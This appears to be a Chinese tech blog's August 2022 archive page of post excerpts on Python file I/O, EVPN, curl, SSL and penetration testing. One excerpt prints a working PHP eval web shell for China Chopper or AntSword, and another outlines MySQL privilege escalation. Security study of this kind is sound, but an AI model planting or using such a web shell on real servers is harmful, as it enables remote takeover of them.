08 2022 档案
摘要:文件操作创建文件"asdf.txt" open( ) # 打开 file # 文件的位置(路径) mode # 操作文件的模式 encoding # 文件编码方式 f # 文件句柄 f = open("asdf",mode="r",encoding="utf-8") print(f.read())
阅读全文
摘要:PHP一句话: 1、普通一句话: <?php @eval($_POST[123456]); ?> *post后面中括号里面的内容是使用菜刀或蚁剑连接时的密码 2、防爆破一句话: <?php substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST[
阅读全文
摘要:1. 前言 EVPN全称是Ethernet Virtual Private Network,由RFC7432(BGP MPLS-Based Ethernet VPN)定义。从名字上看,这是一个基于BGP和MPLS的L2 VPN。虽然这是一个2015年才有编号的RFC,但当它还是草案时,很多厂商已经开
阅读全文
摘要:curl是一个非常实用的、用来与服务器之间传输数据的工具;支持的协议包括 (DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMTP,
阅读全文
摘要:1、单向认证和双向认证 单向认证 SSL 协议的具体过程 ①客户端的浏览器向服务器传送客户端 SSL 协议的版本号,加密算法的种类,产生的随机数,以及其他服务器和客户端之间通讯所需要的各种信息。 ②服务器向客户端传送 SSL 协议的版本号,加密算法的种类,随机数以及其他相关信息,同时服务器还将向客户
阅读全文
摘要:1、模块说明 requests是使用Apache2 licensed 许可证的HTTP库。 用python编写。 比urllib2模块更简洁。 Request支持HTTP连接保持和连接池,支持使用cookie保持会话,支持文件上传,支持自动响应内容的编码,支持国际化的URL和POST数据自动编码。
阅读全文
摘要:Mac系统下的工具整合,记得安装brew哦 信息收集工具 工具名称安装命令 CeWL brew install sidaf/pentest/cewl dirb brew install sidaf/pentest/dirb dnsrecon brew install sidaf/pentest/dn
阅读全文
摘要:前言 数据库权限 在平常的渗透提权中,我们通常可以在一些特殊情况下得到数据库的用户名和密码(最高权限root),如下: MySQL 3306 端口弱口令爆破 sqlmap 注入的 --sql-shell 模式 网站的数据库配置文件中拿到明文密码信息 CVE-2012-2122 等这类漏洞直接拿下 M
阅读全文
